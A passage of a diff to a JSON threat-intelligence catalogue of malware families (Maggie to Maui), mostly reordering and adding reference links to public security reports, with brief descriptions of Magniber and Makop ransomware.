+ "https://medium.com/@DCSO_CyTec/tracking-down-maggie-4d889872513d"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "2e4a63ab-9a04-472f-aad0-3eb4835a4697",
+ "value": "Maggie"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.magic_rat",
+ "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
+ "https://www.attackiq.com/2023/01/05/emulating-the-highly-sophisticated-north-korean-adversary-lazarus-group/",
"https://blog.talosintelligence.com/2022/09/lazarus-magicrat.html"
],
"synonyms": [],
@@ -30570,25 +32294,30 @@
"value": "MagicRAT"
},
{
- "description": "",
+ "description": "According to TXOne, The Magniber ransomware was first identified in late 2017 when it was discovered using the Magnitude Exploit Kit to conduct malvertising attacks against users in South Korea. However, it has remained active since then, continually updating its tactics by employing new obfuscation techniques and methods of evasion. In April 2022, Magniber gained notoriety for disguising itself as a Windows update file to lure victims into installing it. It then began spreading via JavaScript in September 2022.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.magniber",
- "https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/",
- "https://www.youtube.com/watch?v=lqWJaaofNf4",
- "https://www.bleepingcomputer.com/news/security/fake-windows-10-updates-infect-you-with-magniber-ransomware/",
- "https://asec.ahnlab.com/en/19273/",
- "https://therecord.media/printnightmare-vulnerability-weaponized-by-magniber-ransomware-gang/",
- "https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/",
- "https://medium.com/coinmonks/passive-income-of-cyber-criminals-dissecting-bitcoin-multiplier-scam-b9d2b6048372",
- "http://asec.ahnlab.com/1124",
- "https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/",
"https://www.cybereason.com/blog/threat-analysis-report-printnightmare-and-magniber-ransomware",
- "https://decoded.avast.io/janvojtesek/magnitude-exploit-kit-still-alive-and-kicking/",
- "https://asec.ahnlab.com/en/30645/",
- "https://www.bleepingcomputer.com/news/security/magniber-ransomware-gang-now-exploits-internet-explorer-flaws-in-attacks/",
+ "https://hshrzd.wordpress.com/2023/03/30/magniber-ransomware-analysis/",
+ "https://asec.ahnlab.com/en/41889/",
"https://teamt5.org/tw/posts/internet-explorer-the-vulnerability-ridden-browser/",
- "https://decoded.avast.io/janvojtesek/exploit-kits-vs-google-chrome/"
+ "https://medium.com/coinmonks/passive-income-of-cyber-criminals-dissecting-bitcoin-multiplier-scam-b9d2b6048372",
+ "https://blog.google/threat-analysis-group/magniber-ransomware-actors-used-a-variant-of-microsoft-smartscreen-bypass/",
+ "https://decoded.avast.io/janvojtesek/magnitude-exploit-kit-still-alive-and-kicking/",
+ "https://decoded.avast.io/janvojtesek/exploit-kits-vs-google-chrome/",
+ "https://www.bleepingcomputer.com/news/security/fake-windows-10-updates-infect-you-with-magniber-ransomware/",
+ "https://www.youtube.com/watch?v=lqWJaaofNf4",
+ "https://threatresearch.ext.hp.com/magniber-ransomware-switches-to-javascript-targeting-home-users-with-fake-software-updates/",
+ "https://asec.ahnlab.com/en/19273/",
+ "https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/",
+ "https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/",
+ "http://asec.ahnlab.com/1124",
+ "https://asec.ahnlab.com/en/30645/",
+ "https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/",
+ "https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer",
+ "https://therecord.media/printnightmare-vulnerability-weaponized-by-magniber-ransomware-gang/",
+ "https://www.bleepingcomputer.com/news/security/magniber-ransomware-gang-now-exploits-internet-explorer-flaws-in-attacks/"
],
"synonyms": [],
"type": []
@@ -30601,68 +32330,68 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mailto",
- "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
- "https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million",
- "https://blogs.blackberry.com/en/2021/03/zerologon-to-ransomware",
- "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-two-of-three/",
- "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://www.zeit.de/digital/2021-06/cybercrime-extortion-internet-spyware-ransomware-police-prosecution-hackers",
- "https://www.bleepingcomputer.com/news/security/mailto-netwalker-ransomware-targets-enterprise-networks/",
+ "https://www.bleepingcomputer.com/news/security/netwalker-ransomware-affiliate-sentenced-to-80-months-in-prison/",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
"https://www.ucsf.edu/news/2020/06/417911/update-it-security-incident-ucsf",
- "https://id-ransomware.blogspot.com/2019/09/koko-ransomware.html",
- "https://www.bleepingcomputer.com/news/security/netwalker-ransomware-infecting-users-via-coronavirus-phishing/",
- "https://danusminimus.github.io/Zero2Auto-Netwalker-Walkthrough/",
+ "https://lopqto.me/posts/automated-dynamic-import-resolving",
+ "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
+ "https://seguranca-informatica.pt/netwalker-ransomware-full-analysis/",
+ "https://www.bleepingcomputer.com/news/security/michigan-state-university-network-breached-in-ransomware-attack/",
+ "https://www.bleepingcomputer.com/news/security/mailto-netwalker-ransomware-targets-enterprise-networks/",
+ "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/",
"https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-three-of-three/",
+ "https://www.youtube.com/watch?v=q8of74upT_g",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
"https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
"https://www.incibe-cert.es/blog/ransomware-netwalker-analisis-y-medidas-preventivas",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://sites.temple.edu/care/ci-rw-attacks/",
+ "https://blogs.blackberry.com/en/2021/03/zerologon-to-ransomware",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
"https://www.mcafee.com/blogs/other-blogs/mcafee-labs/take-a-netwalk-on-the-wild-side/",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-three-of-three/",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://seguranca-informatica.pt/netwalker-ransomware-full-analysis/",
- "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
- "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/",
- "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html",
- "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://www.justice.gov/usao-mdfl/press-release/file/1360846/download",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://zero2auto.com/2020/05/19/netwalker-re/",
- "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/ReportCSIT-20081e.pdf",
- "https://cert-agid.gov.it/news/netwalker-il-ransomware-che-ha-beffato-lintera-community/",
- "https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million/",
- "https://www.cybereason.com/blog/cybereason-vs.-netwalker-ransomware",
- "https://www.bleepingcomputer.com/news/security/michigan-state-university-network-breached-in-ransomware-attack/",
- "https://krebsonsecurity.com/2021/01/arrest-seizures-tied-to-netwalker-ransomware",
- "https://www.youtube.com/watch?v=q8of74upT_g",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-one-of-three/",
- "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
- "https://www.crowdstrike.com/blog/analysis-of-ecrime-menu-style-toolkits/",
- "https://www.ic3.gov/media/news/2020/200929-2.pdf",
- "https://s3.documentcloud.org/documents/21199896/vachon-desjardins-court-docs.pdf",
- "https://www.justice.gov/opa/pr/department-justice-launches-global-action-against-netwalker-ransomware",
- "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
- "https://lopqto.me/posts/automated-dynamic-import-resolving",
- "https://www.bleepingcomputer.com/news/security/netwalker-ransomware-affiliate-sentenced-to-80-months-in-prison/",
- "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
"https://0x00-0x7f.github.io/Netwalker-from-Powershell-reflective-loader-to-injected-Dll/",
+ "https://www.crowdstrike.com/blog/analysis-of-ecrime-menu-style-toolkits/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-two-of-three/",
+ "https://www.cybereason.com/blog/cybereason-vs.-netwalker-ransomware",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
+ "https://sites.temple.edu/care/ci-rw-attacks/",
+ "https://www.zeit.de/digital/2021-06/cybercrime-extortion-internet-spyware-ransomware-police-prosecution-hackers",
+ "https://krebsonsecurity.com/2021/01/arrest-seizures-tied-to-netwalker-ransomware",
+ "https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://danusminimus.github.io/Zero2Auto-Netwalker-Walkthrough/",
+ "https://tccontre.blogspot.com/2020/05/netwalker-ransomware-api-call.html",
+ "https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million/",
+ "https://zengo.com/bitcoin-ransomware-detective-ucsf/",
+ "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://zero2auto.com/2020/05/19/netwalker-re/",
+ "https://www.ic3.gov/media/news/2020/200929-2.pdf",
+ "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
+ "https://www.justice.gov/usao-mdfl/press-release/file/1360846/download",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://id-ransomware.blogspot.com/2019/09/koko-ransomware.html",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
+ "https://s3.documentcloud.org/documents/21199896/vachon-desjardins-court-docs.pdf",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
"https://www.advanced-intel.com/post/netwalker-ransomware-group-enters-advanced-targeting-game",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf",
"https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/",
+ "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://cert-agid.gov.it/news/netwalker-il-ransomware-che-ha-beffato-lintera-community/",
+ "https://www.bleepingcomputer.com/news/security/netwalker-ransomware-infecting-users-via-coronavirus-phishing/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/ReportCSIT-20081e.pdf",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
"https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
"https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
- "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/",
- "https://zengo.com/bitcoin-ransomware-detective-ucsf/",
- "https://tccontre.blogspot.com/2020/05/netwalker-ransomware-api-call.html"
+ "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/",
+ "https://www.justice.gov/opa/pr/department-justice-launches-global-action-against-netwalker-ransomware"
],
"synonyms": [
"Koko Ransomware",
@@ -30678,11 +32407,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mail_o",
- "https://therecord.media/fsb-nktski-foreign-cyber-mercenaries-breached-russian-federal-agencies/",
+ "https://blog.group-ib.com/task",
"https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/",
"https://rt-solar.ru/upload/iblock/b55/Ataki-na-FOIV_otchet-NKTSKI-i-Rostelekom_Solar_otkrytyy.pdf",
"https://www.sentinelone.com/labs/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op",
- "https://blog.group-ib.com/task"
+ "https://therecord.media/fsb-nktski-foreign-cyber-mercenaries-breached-russian-federal-agencies/"
],
"synonyms": [],
"type": []
@@ -30695,8 +32424,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.majik_pos",
- "https://www.cyber.nj.gov/threat-profiles/pos-malware-variants/majikpos",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/majikpos-combines-pos-malware-and-rats/"
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/majikpos-combines-pos-malware-and-rats/",
+ "https://www.cyber.nj.gov/threat-profiles/pos-malware-variants/majikpos"
],
"synonyms": [],
"type": []
@@ -30709,10 +32438,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.makadocs",
- "http://contagiodump.blogspot.com/2012/12/nov-2012-backdoorw32makadocs-sample.html",
- "https://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs",
+ "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/",
"https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/",
- "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/"
+ "https://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs",
+ "http://contagiodump.blogspot.com/2012/12/nov-2012-backdoorw32makadocs-sample.html"
],
"synonyms": [],
"type": []
@@ -30734,13 +32463,14 @@
"value": "MakLoader"
},
{
- "description": "",
+ "description": "BeforeCrypt describes that MAKOP Ransomware first appeared in 2020 as an offshoot of the PHOBOS variant, and that it has infected a number of computers since then. Files encrypted by MAKOP often have the extension “.makop”. You may also notice that your desktop wallpaper has changed. MAKOP uses RSA encryption. There are no known free decryption tools capable of decrypting files encrypted by MAKOP.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.makop_ransomware",
"https://lifars.com/wp-content/uploads/2021/08/Makop-Ransomware-Whitepaper-case-studyNEW-1.pdf",
+ "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/",
"https://twitter.com/siri_urz/status/1221797493849018368",
- "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/"
+ "https://medium.com/@lcam/makop-the-toolkit-of-a-criminal-gang-53cd44563c11"
],
"synonyms": [],
"type": []
@@ -30753,9 +32483,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.maktub",
- "https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/",
+ "https://bartblaze.blogspot.de/2018/04/maktub-ransomware-possibly-rebranded-as.html",
"https://blog.malwarebytes.com/threat-analysis/2016/03/maktub-locker-beautiful-and-dangerous/",
- "https://bartblaze.blogspot.de/2018/04/maktub-ransomware-possibly-rebranded-as.html"
+ "https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/"
],
"synonyms": [],
"type": []
@@ -30781,9 +32511,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mamba",
+ "https://www.youtube.com/watch?v=LUxOcpIRxmg",
"http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/",
"https://www.ic3.gov/Media/News/2021/210323.pdf",
- "https://www.youtube.com/watch?v=LUxOcpIRxmg",
"https://securelist.com/the-return-of-mamba-ransomware/79403/"
],
"synonyms": [
@@ -30816,9 +32546,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf",
"https://www.hybrid-analysis.com/sample/5d631d77401615d53f3ce3dbc2bfee5d934602dc35d488aa7cebf9b3ff1c4816?environmentId=2",
- "https://www.youtube.com/watch?v=NFJqD-LcpIg",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf"
+ "https://www.youtube.com/watch?v=NFJqD-LcpIg"
],
"synonyms": [
"junidor",
@@ -30853,15 +32583,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "25db921d-d753-4fb1-b51b-961d7fdae6f4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "13b0d9ff-0be0-4539-8c86-dfca7a0e79f6",
"value": "ManItsMe"
},
@@ -30870,8 +32591,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.manjusaka",
- "https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html",
- "https://github.com/avast/ioc/tree/master/Manjusaka"
+ "https://github.com/avast/ioc/tree/master/Manjusaka",
+ "https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html"
],
"synonyms": [],
"type": []
@@ -30902,15 +32623,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "bf08965f-03a5-4cf6-83fb-8d3c9e9398ee",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "8a97307f-a029-4c43-88e1-debed2b80b14",
"value": "MAPIget"
},
@@ -30919,8 +32631,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.marap",
- "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-prepare-more-part-1-marap",
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-prepare-more-part-1-marap",
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf"
],
"synonyms": [],
@@ -30934,9 +32646,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mariposa",
- "https://krebsonsecurity.com/2019/10/mariposa-botnet-author-darkcode-crime-forum-admin-arrested-in-germany/",
"https://www.us-cert.gov/ics/advisories/ICSA-10-090-01",
- "https://defintel.com/docs/Mariposa_Analysis.pdf"
+ "https://defintel.com/docs/Mariposa_Analysis.pdf",
+ "https://krebsonsecurity.com/2019/10/mariposa-botnet-author-darkcode-crime-forum-admin-arrested-in-germany/"
],
"synonyms": [
"Autorun",
@@ -30981,23 +32693,26 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mars_stealer",
- "https://x-junior.github.io/malware%20analysis/MarsStealer/",
- "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/",
- "https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
- "https://cert.gov.ua/article/38606",
- "https://3xp0rt.com/posts/mars-stealer",
- "https://www.esentire.com/blog/fake-chrome-setup-leads-to-netsupportmanager-rat-and-mars-stealer",
- "https://www.microsoft.com/security/blog/2022/05/17/in-hot-pursuit-of-cryware-defending-hot-wallets-from-attacks/",
- "https://cyberint.com/blog/research/mars-stealer/",
"https://isc.sans.edu/diary/rss/28468",
+ "https://cyberint.com/blog/research/mars-stealer/",
"https://ke-la.com/information-stealers-a-new-landscape/",
+ "https://www.esentire.com/blog/fake-chrome-setup-leads-to-netsupportmanager-rat-and-mars-stealer",
+ "https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/",
+ "https://cert.gov.ua/article/38606",
+ "https://x-junior.github.io/malware%20analysis/MarsStealer/",
"https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-mars-stealer",
+ "https://3xp0rt.com/posts/mars-stealer",
+ "https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468",
"https://blog.morphisec.com/threat-research-mars-stealer",
"https://blog.sekoia.io/mars-a-red-hot-information-stealer/",
+ "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
+ "https://www.microsoft.com/security/blog/2022/05/17/in-hot-pursuit-of-cryware-defending-hot-wallets-from-attacks/",
+ "https://blog.cyble.com/2022/08/02/fake-atomic-wallet-website-distributing-mars-stealer/",
"https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
+ "https://drive.google.com/file/d/14cmYxzowVLyuiS5qDGOKzgI2_vak2Fve/view",
"https://resources.infosecinstitute.com/topic/mars-stealer-malware-analysis/",
- "https://blog.cyble.com/2022/08/02/fake-atomic-wallet-website-distributing-mars-stealer/"
+ "https://threatmon.io/mars-stealer-malware-analysis-threatmon/"
],
"synonyms": [],
"type": []
@@ -31023,16 +32738,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.masslogger",
- "https://www.gdatasoftware.com/blog/2020/06/36129-harmful-logging-diving-into-masslogger",
- "https://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html",
- "https://www.seqrite.com/blog/masslogger-an-emerging-spyware-and-keylogger/",
- "https://medium.com/@mariohenkel/decrypt-masslogger-2-4-0-0-configuration-eff3ee0720a7",
- "https://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/",
"https://www.fireeye.com/blog/threat-research/2020/08/bypassing-masslogger-anti-analysis-man-in-the-middle-approach.html",
- "https://twitter.com/pancak3lullz/status/1255893734241304576",
- "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html",
"https://decoded.avast.io/anhho/masslogger-v3-a-net-stealer-with-serious-obfuscation/",
- "https://fr3d.hk/blog/masslogger-frankenstein-s-creation"
+ "https://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html",
+ "https://twitter.com/pancak3lullz/status/1255893734241304576",
+ "https://medium.com/@mariohenkel/decrypt-masslogger-2-4-0-0-configuration-eff3ee0720a7",
+ "https://fr3d.hk/blog/masslogger-frankenstein-s-creation",
+ "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html",
+ "https://www.gdatasoftware.com/blog/2020/06/36129-harmful-logging-diving-into-masslogger",
+ "https://www.seqrite.com/blog/masslogger-an-emerging-spyware-and-keylogger/",
+ "https://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/"
],
"synonyms": [],
"type": []
@@ -31045,26 +32760,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.matanbuchus",
- "https://blog.cyble.com/2022/06/23/matanbuchus-loader-resurfaces/",
- "https://research.openanalysis.net/matanbuchus/loader/yara/triage/dumpulator/emulation/2022/06/19/matanbuchus-triage.html",
"https://medium.com/@DCSO_CyTec/a-deal-with-the-devil-analysis-of-a-recent-matanbuchus-sample-3ce991951d6a",
- "https://www.0ffset.net/reverse-engineering/matanbuchus-loader-analysis/",
"https://unit42.paloaltonetworks.com/matanbuchus-malware-as-a-service/",
+ "https://research.openanalysis.net/matanbuchus/loader/yara/triage/dumpulator/emulation/2022/06/19/matanbuchus-triage.html",
+ "https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer",
+ "https://r136a1.info/2022/05/25/introduction-of-a-pe-file-extractor-for-various-situations/",
+ "https://www.0ffset.net/reverse-engineering/matanbuchus-loader-analysis/",
"https://isc.sans.edu/diary/rss/28752",
- "https://r136a1.info/2022/05/25/introduction-of-a-pe-file-extractor-for-various-situations/"
+ "https://blog.cyble.com/2022/06/23/matanbuchus-loader-resurfaces/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "2214b113-6942-494f-94b7-576e74fccdb5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "e30f2243-9e69-4b09-97ab-1643929b97ad",
"value": "Matanbuchus"
},
@@ -31099,11 +32806,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_ransom",
- "https://www.blackhoodie.re/assets/archive/Matrix_Ransomware_blackhoodie.pdf",
"https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophoslabs-matrix-report.pdf",
- "https://unit42.paloaltonetworks.com/matrix-ransomware/",
- "https://blogs.blackberry.com/en/2018/11/threat-spotlight-inside-vssdestroy-ransomware",
"https://news.sophos.com/en-us/2019/01/30/matrix-targeted-small-scale-canary-in-the-coal-mine-ransomware/",
+ "https://blogs.blackberry.com/en/2018/11/threat-spotlight-inside-vssdestroy-ransomware",
+ "https://unit42.paloaltonetworks.com/matrix-ransomware/",
+ "https://www.blackhoodie.re/assets/archive/Matrix_Ransomware_blackhoodie.pdf",
"https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf"
],
"synonyms": [],
@@ -31117,8 +32824,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.matryoshka_rat",
- "https://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf",
- "http://www.clearskysec.com/tulip/"
+ "http://www.clearskysec.com/tulip/",
+ "https://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf"
],
"synonyms": [],
"type": []
@@ -31144,8 +32851,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.maudi",
- "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2012/NormanShark-MaudiOperation.pdf",
- "https://contagiodump.blogspot.com/2010/06/may-28-cve-2009-3129-xls-for-office.html"
+ "https://contagiodump.blogspot.com/2010/06/may-28-cve-2009-3129-xls-for-office.html",
+ "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2012/NormanShark-MaudiOperation.pdf"
],
"synonyms": [],
"type": []
@@ -31159,9 +32866,10 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.maui",
"https://www.cisa.gov/uscert/ncas/alerts/aa22-187a",
- "https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/",
+ "https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF",
+ "https://stairwell.com/wp-content/uploads/2022/07/Stairwell-Threat-Report-Maui-Ransomware.pdf",
